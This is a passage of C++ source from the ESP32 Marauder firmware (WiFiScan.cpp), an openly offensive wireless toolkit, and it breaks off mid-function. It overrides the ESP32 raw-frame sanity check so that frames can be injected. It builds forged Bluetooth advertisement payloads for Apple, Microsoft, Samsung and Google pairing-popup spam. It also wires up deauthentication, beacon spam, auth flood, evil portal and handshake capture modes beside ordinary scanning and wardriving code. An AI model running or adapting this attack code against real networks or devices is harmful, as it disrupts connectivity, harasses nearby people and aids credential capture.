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ESP32Marauder/esp32_marauder/WiFiScan.cpp
Just Call Me Koko 1f10c73c5e Add fixed ESPAsyncWebServer update NimBLE
2024-06-26 18:00:03 -04:00

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#include "WiFiScan.h"
#include "lang_var.h"
int num_beacon = 0;
int num_deauth = 0;
int num_probe = 0;
int num_eapol = 0;
LinkedList<ssid>* ssids;
LinkedList<AccessPoint>* access_points;
LinkedList<Station>* stations;
extern "C" int ieee80211_raw_frame_sanity_check(int32_t arg, int32_t arg2, int32_t arg3){
if (arg == 31337)
return 1;
else
return 0;
}
extern "C" {
uint8_t esp_base_mac_addr[6];
esp_err_t esp_base_mac_addr_set(const uint8_t *addr);
esp_err_t esp_ble_gap_set_rand_addr(const uint8_t *rand_addr);
}
#ifdef HAS_BT
//ESP32 Sour Apple by RapierXbox
//Exploit by ECTO-1A
NimBLEAdvertising *pAdvertising;
//// https://github.com/Spooks4576
NimBLEAdvertisementData WiFiScan::GetUniversalAdvertisementData(EBLEPayloadType Type) {
NimBLEAdvertisementData AdvData = NimBLEAdvertisementData();
uint8_t* AdvData_Raw = nullptr;
uint8_t i = 0;
switch (Type) {
case Microsoft: {
const char* Name = this->generateRandomName();
uint8_t name_len = strlen(Name);
AdvData_Raw = new uint8_t[7 + name_len];
AdvData_Raw[i++] = 7 + name_len - 1;
AdvData_Raw[i++] = 0xFF;
AdvData_Raw[i++] = 0x06;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x03;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x80;
memcpy(&AdvData_Raw[i], Name, name_len);
i += name_len;
AdvData.addData(std::string((char *)AdvData_Raw, 7 + name_len));
break;
}
case Apple: {
AdvData_Raw = new uint8_t[17];
AdvData_Raw[i++] = 17 - 1; // Packet Length
AdvData_Raw[i++] = 0xFF; // Packet Type (Manufacturer Specific)
AdvData_Raw[i++] = 0x4C; // Packet Company ID (Apple, Inc.)
AdvData_Raw[i++] = 0x00; // ...
AdvData_Raw[i++] = 0x0F; // Type
AdvData_Raw[i++] = 0x05; // Length
AdvData_Raw[i++] = 0xC1; // Action Flags
const uint8_t types[] = { 0x27, 0x09, 0x02, 0x1e, 0x2b, 0x2d, 0x2f, 0x01, 0x06, 0x20, 0xc0 };
AdvData_Raw[i++] = types[rand() % sizeof(types)]; // Action Type
esp_fill_random(&AdvData_Raw[i], 3); // Authentication Tag
i += 3;
AdvData_Raw[i++] = 0x00; // ???
AdvData_Raw[i++] = 0x00; // ???
AdvData_Raw[i++] = 0x10; // Type ???
esp_fill_random(&AdvData_Raw[i], 3);
AdvData.addData(std::string((char *)AdvData_Raw, 17));
break;
}
case Samsung: {
AdvData_Raw = new uint8_t[15];
uint8_t model = watch_models[rand() % 25].value;
AdvData_Raw[i++] = 14; // Size
AdvData_Raw[i++] = 0xFF; // AD Type (Manufacturer Specific)
AdvData_Raw[i++] = 0x75; // Company ID (Samsung Electronics Co. Ltd.)
AdvData_Raw[i++] = 0x00; // ...
AdvData_Raw[i++] = 0x01;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x02;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x01;
AdvData_Raw[i++] = 0x01;
AdvData_Raw[i++] = 0xFF;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x00;
AdvData_Raw[i++] = 0x43;
AdvData_Raw[i++] = (model >> 0x00) & 0xFF; // Watch Model / Color (?)
AdvData.addData(std::string((char *)AdvData_Raw, 15));
break;
}
case Google: {
AdvData_Raw = new uint8_t[14];
AdvData_Raw[i++] = 3;
AdvData_Raw[i++] = 0x03;
AdvData_Raw[i++] = 0x2C; // Fast Pair ID
AdvData_Raw[i++] = 0xFE;
AdvData_Raw[i++] = 6;
AdvData_Raw[i++] = 0x16;
AdvData_Raw[i++] = 0x2C; // Fast Pair ID
AdvData_Raw[i++] = 0xFE;
AdvData_Raw[i++] = 0x00; // Smart Controller Model ID
AdvData_Raw[i++] = 0xB7;
AdvData_Raw[i++] = 0x27;
AdvData_Raw[i++] = 2;
AdvData_Raw[i++] = 0x0A;
AdvData_Raw[i++] = (rand() % 120) - 100; // -100 to +20 dBm
AdvData.addData(std::string((char *)AdvData_Raw, 14));
break;
}
default: {
Serial.println("Please Provide a Company Type");
break;
}
}
delete[] AdvData_Raw;
return AdvData;
}
//// https://github.com/Spooks4576
class bluetoothScanAllCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
extern WiFiScan wifi_scan_obj;
//#ifdef HAS_SCREEN
// int buf = display_obj.display_buffer->size();
//#else
int buf = 0;
//#endif
String display_string = "";
if (wifi_scan_obj.currentScanMode == BT_SCAN_ALL) {
if (buf >= 0)
{
display_string.concat(text_table4[0]);
display_string.concat(advertisedDevice->getRSSI());
Serial.print(" RSSI: ");
Serial.print(advertisedDevice->getRSSI());
display_string.concat(" ");
Serial.print(" ");
Serial.print("Device: ");
if(advertisedDevice->getName().length() != 0)
{
display_string.concat(advertisedDevice->getName().c_str());
Serial.print(advertisedDevice->getName().c_str());
}
else
{
display_string.concat(advertisedDevice->getAddress().toString().c_str());
Serial.print(advertisedDevice->getAddress().toString().c_str());
}
#ifdef HAS_SCREEN
uint8_t temp_len = display_string.length();
for (uint8_t i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.println();
while (display_obj.printing)
delay(1);
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
#endif
}
}
else if ((wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE) || (wifi_scan_obj.currentScanMode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_GPS
if (gps_obj.getGpsModuleStatus()) {
bool do_save = false;
if (buf >= 0)
{
Serial.print("Device: ");
if(advertisedDevice->getName().length() != 0)
{
display_string.concat(advertisedDevice->getName().c_str());
Serial.print(advertisedDevice->getName().c_str());
}
else
{
display_string.concat(advertisedDevice->getAddress().toString().c_str());
Serial.print(advertisedDevice->getAddress().toString().c_str());
}
if (gps_obj.getFixStatus()) {
do_save = true;
display_string.concat(" | Lt: " + gps_obj.getLat());
display_string.concat(" | Ln: " + gps_obj.getLon());
}
else {
display_string.concat(" | GPS: No Fix");
}
#ifdef HAS_SCREEN
uint8_t temp_len = display_string.length();
for (uint8_t i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
Serial.println();
while (display_obj.printing)
delay(1);
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
#endif
String wardrive_line = (String)advertisedDevice->getAddress().toString().c_str() + ",,[BLE]," + gps_obj.getDatetime() + ",0," + (String)advertisedDevice->getRSSI() + "," + gps_obj.getLat() + "," + gps_obj.getLon() + "," + gps_obj.getAlt() + "," + gps_obj.getAccuracy() + ",BLE\n";
Serial.print(wardrive_line);
if (do_save)
buffer_obj.append(wardrive_line);
}
}
#endif
}
}
};
class bluetoothScanSkimmersCallback: public BLEAdvertisedDeviceCallbacks {
void onResult(BLEAdvertisedDevice *advertisedDevice) {
String bad_list[bad_list_length] = {"HC-03", "HC-05", "HC-06"};
#ifdef HAS_SCREEN
int buf = display_obj.display_buffer->size();
#else
int buf = 0;
#endif
if (buf >= 0)
{
Serial.print("Device: ");
String display_string = "";
if(advertisedDevice->getName().length() != 0)
{
Serial.print(advertisedDevice->getName().c_str());
for(uint8_t i = 0; i < bad_list_length; i++)
{
#ifdef HAS_SCREEN
if(strcmp(advertisedDevice->getName().c_str(), bad_list[i].c_str()) == 0)
{
display_string.concat(text_table4[1]);
display_string.concat(" ");
display_string.concat(advertisedDevice->getName().c_str());
uint8_t temp_len = display_string.length();
for (uint8_t i = 0; i < 40 - temp_len; i++)
{
display_string.concat(" ");
}
while (display_obj.printing)
delay(1);
display_obj.loading = true;
display_obj.display_buffer->add(display_string);
display_obj.loading = false;
}
#endif
}
}
else
{
Serial.print(advertisedDevice->getAddress().toString().c_str());
}
Serial.print(" RSSI: ");
Serial.println(advertisedDevice->getRSSI());
}
}
};
#endif
WiFiScan::WiFiScan()
{
}
String WiFiScan::macToString(const Station& station) {
char macStr[18]; // 6 pairs of hex digits + 5 colons + null terminator
snprintf(macStr, sizeof(macStr), "%02X:%02X:%02X:%02X:%02X:%02X",
station.mac[0], station.mac[1], station.mac[2],
station.mac[3], station.mac[4], station.mac[5]);
return String(macStr);
}
void WiFiScan::RunSetup() {
if (ieee80211_raw_frame_sanity_check(31337, 0, 0) == 1)
this->wsl_bypass_enabled = true;
else
this->wsl_bypass_enabled = false;
ssids = new LinkedList<ssid>();
access_points = new LinkedList<AccessPoint>();
stations = new LinkedList<Station>();
#ifdef HAS_BT
watch_models = new WatchModel[26] {
{0x1A, "Fallback Watch"},
{0x01, "White Watch4 Classic 44m"},
{0x02, "Black Watch4 Classic 40m"},
{0x03, "White Watch4 Classic 40m"},
{0x04, "Black Watch4 44mm"},
{0x05, "Silver Watch4 44mm"},
{0x06, "Green Watch4 44mm"},
{0x07, "Black Watch4 40mm"},
{0x08, "White Watch4 40mm"},
{0x09, "Gold Watch4 40mm"},
{0x0A, "French Watch4"},
{0x0B, "French Watch4 Classic"},
{0x0C, "Fox Watch5 44mm"},
{0x11, "Black Watch5 44mm"},
{0x12, "Sapphire Watch5 44mm"},
{0x13, "Purpleish Watch5 40mm"},
{0x14, "Gold Watch5 40mm"},
{0x15, "Black Watch5 Pro 45mm"},
{0x16, "Gray Watch5 Pro 45mm"},
{0x17, "White Watch5 44mm"},
{0x18, "White & Black Watch5"},
{0x1B, "Black Watch6 Pink 40mm"},
{0x1C, "Gold Watch6 Gold 40mm"},
{0x1D, "Silver Watch6 Cyan 44mm"},
{0x1E, "Black Watch6 Classic 43m"},
{0x20, "Green Watch6 Classic 43m"},
};
NimBLEDevice::setScanFilterMode(CONFIG_BTDM_SCAN_DUPL_TYPE_DEVICE);
NimBLEDevice::setScanDuplicateCacheSize(200);
NimBLEDevice::init("");
pBLEScan = NimBLEDevice::getScan(); //create new scan
this->ble_initialized = true;
this->shutdownBLE();
#endif
this->initWiFi(1);
}
int WiFiScan::clearStations() {
int num_cleared = stations->size();
stations->clear();
Serial.println("stations: " + (String)stations->size());
// Now clear stations list from APs
for (int i = 0; i < access_points->size(); i++)
access_points->get(i).stations->clear();
return num_cleared;
}
bool WiFiScan::checkMem() {
if (esp_get_free_heap_size() <= MEM_LOWER_LIM)
return false;
else
return true;
}
int WiFiScan::clearAPs() {
int num_cleared = access_points->size();
while (access_points->size() > 0)
access_points->remove(0);
Serial.println("access_points: " + (String)access_points->size());
return num_cleared;
}
int WiFiScan::clearSSIDs() {
int num_cleared = ssids->size();
ssids->clear();
Serial.println("ssids: " + (String)ssids->size());
return num_cleared;
}
bool WiFiScan::addSSID(String essid) {
ssid s = {essid, random(1, 12), {random(256), random(256), random(256), random(256), random(256), random(256)}, false};
ssids->add(s);
Serial.println(ssids->get(ssids->size() - 1).essid);
return true;
}
int WiFiScan::generateSSIDs(int count) {
uint8_t num_gen = count;
for (uint8_t x = 0; x < num_gen; x++) {
String essid = "";
for (uint8_t i = 0; i < 6; i++)
essid.concat(alfa[random(65)]);
ssid s = {essid, random(1, 12), {random(256), random(256), random(256), random(256), random(256), random(256)}, false};
ssids->add(s);
Serial.println(ssids->get(ssids->size() - 1).essid);
}
return num_gen;
}
/*void WiFiScan::joinWiFi(String ssid, String password)
{
static const char * btns[] ={text16, ""};
int count = 0;
if ((WiFi.status() == WL_CONNECTED) && (ssid == connected_network) && (ssid != "")) {
#ifdef HAS_SCREEN
lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
lv_msgbox_set_text(mbox1, text_table4[2]);
lv_msgbox_add_btns(mbox1, btns);
lv_obj_set_width(mbox1, 200);
lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); //Align to the corner
#endif
this->wifi_initialized = true;
return;
}
else if (WiFi.status() == WL_CONNECTED) {
Serial.println("Already connected. Disconnecting...");
WiFi.disconnect();
}
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
WiFi.begin(ssid.c_str(), password.c_str());
Serial.print("Connecting to WiFi");
while (WiFi.status() != WL_CONNECTED) {
delay(500);
Serial.print(".");
count++;
if (count == 10)
{
Serial.println("\nCould not connect to WiFi network");
#ifdef HAS_SCREEN
lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
lv_msgbox_set_text(mbox1, text_table4[3]);
lv_msgbox_add_btns(mbox1, btns);
lv_obj_set_width(mbox1, 200);
//lv_obj_set_event_cb(mbox1, event_handler);
lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); //Align to the corner
#endif
WiFi.mode(WIFI_OFF);
return;
}
}
#ifdef HAS_SCREEN
lv_obj_t * mbox1 = lv_msgbox_create(lv_scr_act(), NULL);
lv_msgbox_set_text(mbox1, text_table4[4]);
lv_msgbox_add_btns(mbox1, btns);
lv_obj_set_width(mbox1, 200);
lv_obj_align(mbox1, NULL, LV_ALIGN_CENTER, 0, 0); //Align to the corner
#endif
connected_network = ssid;
Serial.println("\nConnected to the WiFi network");
Serial.print("IP address: ");
Serial.println(WiFi.localIP());
this->wifi_initialized = true;
}*/
// Apply WiFi settings
void WiFiScan::initWiFi(uint8_t scan_mode) {
// Set the channel
if (scan_mode != WIFI_SCAN_OFF) {
//Serial.println(F("Initializing WiFi settings..."));
this->changeChannel();
this->force_pmkid = settings_obj.loadSetting<bool>(text_table4[5]);
this->force_probe = settings_obj.loadSetting<bool>(text_table4[6]);
this->save_pcap = settings_obj.loadSetting<bool>(text_table4[7]);
//Serial.println(F("Initialization complete"));
}
}
bool WiFiScan::scanning() {
if (this->currentScanMode == WIFI_SCAN_OFF)
return false;
else
return true;
}
// Function to prepare to run a specific scan
void WiFiScan::StartScan(uint8_t scan_mode, uint16_t color)
{
this->initWiFi(scan_mode);
if (scan_mode == WIFI_SCAN_OFF)
StopScan(scan_mode);
else if (scan_mode == WIFI_SCAN_PROBE)
RunProbeScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_STATION_WAR_DRIVE)
RunProbeScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_EVIL_PORTAL)
RunEvilPortal(scan_mode, color);
else if (scan_mode == WIFI_SCAN_EAPOL)
RunEapolScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_ACTIVE_EAPOL)
RunEapolScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_ACTIVE_LIST_EAPOL)
RunEapolScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_AP)
RunBeaconScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_WAR_DRIVE)
RunBeaconScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_SIG_STREN)
RunRawScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_RAW_CAPTURE)
RunRawScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_STATION)
RunStationScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_TARGET_AP)
RunAPScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_TARGET_AP_FULL)
RunAPScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_PWN)
RunPwnScan(scan_mode, color);
else if (scan_mode == WIFI_SCAN_DEAUTH)
RunDeauthScan(scan_mode, color);
else if (scan_mode == WIFI_PACKET_MONITOR) {
#ifdef HAS_SCREEN
RunPacketMonitor(scan_mode, color);
#endif
}
else if (scan_mode == WIFI_ATTACK_BEACON_LIST)
this->startWiFiAttacks(scan_mode, color, text_table1[50]);
else if (scan_mode == WIFI_ATTACK_BEACON_SPAM)
this->startWiFiAttacks(scan_mode, color, text_table1[51]);
else if (scan_mode == WIFI_ATTACK_RICK_ROLL)
this->startWiFiAttacks(scan_mode, color, text_table1[52]);
else if (scan_mode == WIFI_ATTACK_AUTH)
this->startWiFiAttacks(scan_mode, color, text_table1[53]);
else if (scan_mode == WIFI_ATTACK_DEAUTH)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_MANUAL)
this->startWiFiAttacks(scan_mode, color, text_table4[8]);
else if (scan_mode == WIFI_ATTACK_DEAUTH_TARGETED)
this->startWiFiAttacks(scan_mode, color, text_table4[47]);
else if (scan_mode == WIFI_ATTACK_AP_SPAM)
this->startWiFiAttacks(scan_mode, color, " AP Beacon Spam ");
else if (scan_mode == BT_SCAN_ALL) {
#ifdef HAS_BT
RunBluetoothScan(scan_mode, color);
#endif
}
else if (scan_mode == BT_ATTACK_SOUR_APPLE) {
#ifdef HAS_BT
RunSourApple(scan_mode, color);
#endif
}
else if ((scan_mode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(scan_mode == BT_ATTACK_SPAM_ALL) ||
(scan_mode == BT_ATTACK_SAMSUNG_SPAM) ||
(scan_mode == BT_ATTACK_GOOGLE_SPAM)) {
#ifdef HAS_BT
RunSwiftpairSpam(scan_mode, color);
#endif
}
else if ((scan_mode == BT_SCAN_WAR_DRIVE) ||
(scan_mode == BT_SCAN_WAR_DRIVE_CONT)) {
#ifdef HAS_BT
RunBluetoothScan(scan_mode, color);
#endif
}
else if (scan_mode == BT_SCAN_SKIMMERS) {
#ifdef HAS_BT
RunBluetoothScan(scan_mode, color);
#endif
}
else if (scan_mode == LV_ADD_SSID) {
#ifdef HAS_SCREEN
RunLvJoinWiFi(scan_mode, color);
#endif
}
else if (scan_mode == WIFI_SCAN_GPS_NMEA){
#ifdef HAS_GPS
gps_obj.enable_queue();
#endif
}
WiFiScan::currentScanMode = scan_mode;
}
void WiFiScan::startWiFiAttacks(uint8_t scan_mode, uint16_t color, String title_string) {
// Common wifi attack configurations
#ifdef HAS_SCREEN
display_obj.TOP_FIXED_AREA_2 = 48;
display_obj.tteBar = true;
display_obj.print_delay_1 = 15;
display_obj.print_delay_2 = 10;
display_obj.initScrollValues(true);
display_obj.tft.setTextWrap(false);
display_obj.tft.setTextColor(TFT_BLACK, color);
#ifdef HAS_ILI9341
display_obj.tft.fillRect(0,16,TFT_WIDTH,16, color);
display_obj.tft.drawCentreString((String)title_string,TFT_WIDTH / 2,16,2);
display_obj.touchToExit();
#endif
display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
#endif
//wifi_ap_config_t ap_config;
//ap_config.ssid_hidden = 1;
ap_config.ap.ssid_hidden = 1;
ap_config.ap.beacon_interval = 10000;
ap_config.ap.ssid_len = 0;
packets_sent = 0;
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_AP);
esp_wifi_set_config(WIFI_IF_AP, &ap_config);
esp_wifi_start();
esp_wifi_set_channel(set_channel, WIFI_SECOND_CHAN_NONE);
//WiFi.mode(WIFI_AP_STA);
//esp_wifi_init(&cfg);
//esp_wifi_set_storage(WIFI_STORAGE_RAM);
//esp_wifi_set_mode(WIFI_AP_STA);
//esp_wifi_start();
//esp_wifi_set_promiscuous_filter(NULL);
esp_wifi_set_promiscuous(true);
esp_wifi_set_max_tx_power(82);
this->wifi_initialized = true;
#ifdef MARAUDER_FLIPPER
flipper_led.attackLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.attackLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.attackLED();
#else
led_obj.setMode(MODE_ATTACK);
#endif
initTime = millis();
}
bool WiFiScan::shutdownWiFi() {
if (this->wifi_initialized) {
esp_wifi_set_promiscuous(false);
WiFi.disconnect();
WiFi.mode(WIFI_OFF);
dst_mac = "ff:ff:ff:ff:ff:ff";
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_stop();
esp_wifi_restore();
esp_wifi_deinit();
#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.offLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.offLED();
#else
led_obj.setMode(MODE_OFF);
#endif
this->wifi_initialized = false;
return true;
}
else {
return false;
}
}
bool WiFiScan::shutdownBLE() {
#ifdef HAS_BT
if (this->ble_initialized) {
pAdvertising->stop();
pBLEScan->stop();
pBLEScan->clearResults();
NimBLEDevice::deinit();
#ifdef MARAUDER_FLIPPER
flipper_led.offLED();
#elif defined(XIAO_ESP32_S3)
xiao_led.offLED();
#elif defined(MARAUDER_M5STICKC)
stickc_led.offLED();
#else
led_obj.setMode(MODE_OFF);
#endif
this->ble_initialized = false;
return true;
}
else {
return false;
}
#endif
return true;
}
// Function to stop all wifi scans
void WiFiScan::StopScan(uint8_t scan_mode)
{
if ((currentScanMode == WIFI_SCAN_PROBE) ||
(currentScanMode == WIFI_SCAN_AP) ||
(currentScanMode == WIFI_SCAN_WAR_DRIVE) ||
(currentScanMode == WIFI_SCAN_STATION_WAR_DRIVE) ||
(currentScanMode == WIFI_SCAN_EVIL_PORTAL) ||
(currentScanMode == WIFI_SCAN_RAW_CAPTURE) ||
(currentScanMode == WIFI_SCAN_STATION) ||
(currentScanMode == WIFI_SCAN_SIG_STREN) ||
(currentScanMode == WIFI_SCAN_TARGET_AP) ||
(currentScanMode == WIFI_SCAN_TARGET_AP_FULL) ||
(currentScanMode == WIFI_SCAN_PWN) ||
(currentScanMode == WIFI_SCAN_EAPOL) ||
(currentScanMode == WIFI_SCAN_ACTIVE_EAPOL) ||
(currentScanMode == WIFI_SCAN_ACTIVE_LIST_EAPOL) ||
(currentScanMode == WIFI_SCAN_ALL) ||
(currentScanMode == WIFI_SCAN_DEAUTH) ||
(currentScanMode == WIFI_ATTACK_BEACON_LIST) ||
(currentScanMode == WIFI_ATTACK_BEACON_SPAM) ||
(currentScanMode == WIFI_ATTACK_AUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_MANUAL) ||
(currentScanMode == WIFI_ATTACK_DEAUTH_TARGETED) ||
(currentScanMode == WIFI_ATTACK_MIMIC) ||
(currentScanMode == WIFI_ATTACK_RICK_ROLL) ||
(currentScanMode == WIFI_PACKET_MONITOR) ||
(currentScanMode == LV_JOIN_WIFI))
{
this->shutdownWiFi();
}
else if ((currentScanMode == BT_SCAN_ALL) ||
(currentScanMode == BT_ATTACK_SOUR_APPLE) ||
(currentScanMode == BT_ATTACK_SWIFTPAIR_SPAM) ||
(currentScanMode == BT_ATTACK_SPAM_ALL) ||
(currentScanMode == BT_ATTACK_SAMSUNG_SPAM) ||
(currentScanMode == BT_ATTACK_GOOGLE_SPAM) ||
(currentScanMode == BT_SCAN_WAR_DRIVE) ||
(currentScanMode == BT_SCAN_WAR_DRIVE_CONT) ||
(currentScanMode == BT_SCAN_SKIMMERS))
{
#ifdef HAS_BT
this->shutdownBLE();
#endif
}
#ifdef HAS_SCREEN
display_obj.display_buffer->clear();
#ifdef SCREEN_BUFFER
display_obj.screen_buffer->clear();
#endif
//Serial.print("display_buffer->size(): ");
Serial.println(display_obj.display_buffer->size());
display_obj.tteBar = false;
#endif
#ifdef HAS_GPS
gps_obj.disable_queue();
#endif
}
String WiFiScan::getStaMAC()
{
char *buf;
uint8_t mac[6];
char macAddrChr[18] = {0};
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
this->wifi_initialized = true;
sprintf(macAddrChr,
"%02X:%02X:%02X:%02X:%02X:%02X",
mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5]);
this->shutdownWiFi();
return String(macAddrChr);
}
String WiFiScan::getApMAC()
{
char *buf;
uint8_t mac[6];
char macAddrChr[18] = {0};
esp_wifi_init(&cfg);
esp_wifi_set_storage(WIFI_STORAGE_RAM);
esp_wifi_set_mode(WIFI_MODE_NULL);
esp_wifi_start();
esp_err_t mac_status = esp_wifi_get_mac(WIFI_IF_AP, mac);
this->wifi_initialized = true;
sprintf(macAddrChr,
"%02X:%02X:%02X:%02X:%02X:%02X",
mac[0],
mac[1],
mac[2],
mac[3],
mac[4],
mac[5]);
this->shutdownWiFi();
return String(macAddrChr);
}
bool WiFiScan::mac_cmp(struct mac_addr addr1, struct mac_addr addr2) {
//Return true if 2 mac_addr structs are equal.
for (int y = 0; y < 6 ; y++) {
if (addr1.bytes[y] != addr2.bytes[y]) {
return false;
}
}
return true;
}
bool WiFiScan::seen_mac(unsigned char* mac) {
//Return true if this MAC address is in the recently seen array.
struct mac_addr tmp;
for (int x = 0; x < 6 ; x++) {
tmp.bytes[x] = mac[x];
}
for (int x = 0; x < mac_history_len; x++) {
if (this->mac_cmp(tmp, this->mac_history[x])) {
return true;
}
}
return false;
}
void WiFiScan::save_mac(unsigned char* mac) {
//Save a MAC address into the recently seen array.
if (this->mac_history_cursor >= mac_history_len) {
this->mac_history_cursor = 0;
}
struct mac_addr tmp;
for (int x = 0; x < 6 ; x++) {
tmp.bytes[x] = mac[x];
}
this->mac_history[this->mac_history_cursor] = tmp;
this->mac_history_cursor++;
}
String WiFiScan::security_int_to_string(int security_type) {
//Provide a security type int from WiFi.encryptionType(i) to convert it to a String which Wigle CSV expects.
String authtype = "";
switch (security_type) {
case WIFI_AUTH_OPEN:
authtype = "[OPEN]";
break;
case WIFI_AUTH_WEP:
authtype = "[WEP]";
break;
case WIFI_AUTH_WPA_PSK:
authtype = "[WPA_PSK]";
break;
case WIFI_AUTH_WPA2_PSK:
authtype = "[WPA2_PSK]";
break;
case WIFI_AUTH_WPA_WPA2_PSK:
authtype = "[WPA_WPA2_PSK]";
break;
case WIFI_AUTH_WPA2_ENTERPRISE:
authtype = "[WPA2]";
break;
//Requires at least v2.0.0 of https://github.com/espressif/arduino-esp32/
case WIFI_AUTH_WPA3_PSK:
authtype = "[WPA3_PSK]";
break;
case WIFI_AUTH_WPA2_WPA3_PSK:
authtype = "[WPA2_WPA3_PSK]";
break;
case WIFI_AUTH_WAPI_PSK:
authtype = "[WAPI_PSK]";
break;
default:
authtype = "[UNDEFINED]";
}
return authtype;
}
void WiFiScan::clearMacHistory() {
for (int i = 0; i < mac_history_len; ++i) {
memset(this->mac_history[i].bytes, 0, sizeof(mac_history[i].bytes));
}
}
String WiFiScan::freeRAM()
{
char s[150];
sprintf(s, "RAM Free: %u bytes", esp_get_free_heap_size());
this->free_ram = String(esp_get_free_heap_size());
return String(s);
}
void WiFiScan::startPcap(String file_name) {
buffer_obj.pcapOpen(
file_name,
#if defined(HAS_SD)
sd_obj.supported ? &SD :
#endif
NULL,
save_serial // Set with commandline options
);
}
void WiFiScan::startLog(String file_name) {
buffer_obj.logOpen(
file_name,
#if defined(HAS_SD)
sd_obj.supported ? &SD :
#endif
NULL,
save_serial // Set with commandline options
);
}
void WiFiScan::parseBSSID(const char* bssidStr, uint8_t* bssid) {
sscanf(bssidStr, "%02X:%02X:%02X:%02X:%02X:%02X",
&bssid[0], &bssid[1], &bssid[2],
&bssid[3], &bssid[4], &bssid[5]);
}
void WiFiScan::RunLoadAPList() {
#ifdef HAS_SD
File file = sd_obj.getFile("/APs_0.log");
if (!file) {
Serial.println("Could not open /APs_0.log");
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println("Could not open /APs_0.log");
#endif
return;
}
DynamicJsonDocument doc(10048);
DeserializationError error = deserializeJson(doc, file);
if (error) {
Serial.print("JSON deserialize error: ");
Serial.println(error.c_str());
file.close();
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.println("Could not deserialize JSON");
display_obj.tft.println(error.c_str());
#endif
return;
}
JsonArray array = doc.as<JsonArray>();
for (JsonObject obj : array) {
AccessPoint ap;
ap.essid = obj["essid"].as<String>();
ap.channel = obj["channel"];
ap.selected = false;
parseBSSID(obj["bssid"], ap.bssid);
ap.stations = new LinkedList<uint8_t>();
access_points->add(ap);
}
file.close();
//doc.clear();
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.print("Loaded APs: ");
display_obj.tft.println((String)access_points->size());
#endif
Serial.print("Loaded APs:");
Serial.println((String)access_points->size());
#endif
}
void WiFiScan::RunSaveAPList(bool save_as) {
if (save_as) {
sd_obj.removeFile("/APs_0.log");
this->startLog("APs");
DynamicJsonDocument jsonDocument(2048);
JsonArray jsonArray = jsonDocument.to<JsonArray>();
for (int i = 0; i < access_points->size(); i++) {
const AccessPoint& ap = access_points->get(i);
JsonObject jsonAp = jsonArray.createNestedObject();
jsonAp["essid"] = ap.essid;
jsonAp["channel"] = ap.channel;
char bssidStr[18];
sprintf(bssidStr, "%02X:%02X:%02X:%02X:%02X:%02X",
ap.bssid[0], ap.bssid[1], ap.bssid[2],
ap.bssid[3], ap.bssid[4], ap.bssid[5]);
jsonAp["bssid"] = bssidStr;
}
String jsonString;
serializeJson(jsonArray, jsonString);
buffer_obj.append(jsonString);
#ifdef HAS_SCREEN
display_obj.tft.setTextWrap(false);
display_obj.tft.setFreeFont(NULL);
display_obj.tft.setCursor(0, 100);
display_obj.tft.setTextSize(1);
display_obj.tft.setTextColor(TFT_CYAN);
display_obj.tft.print("Saved APs: ");
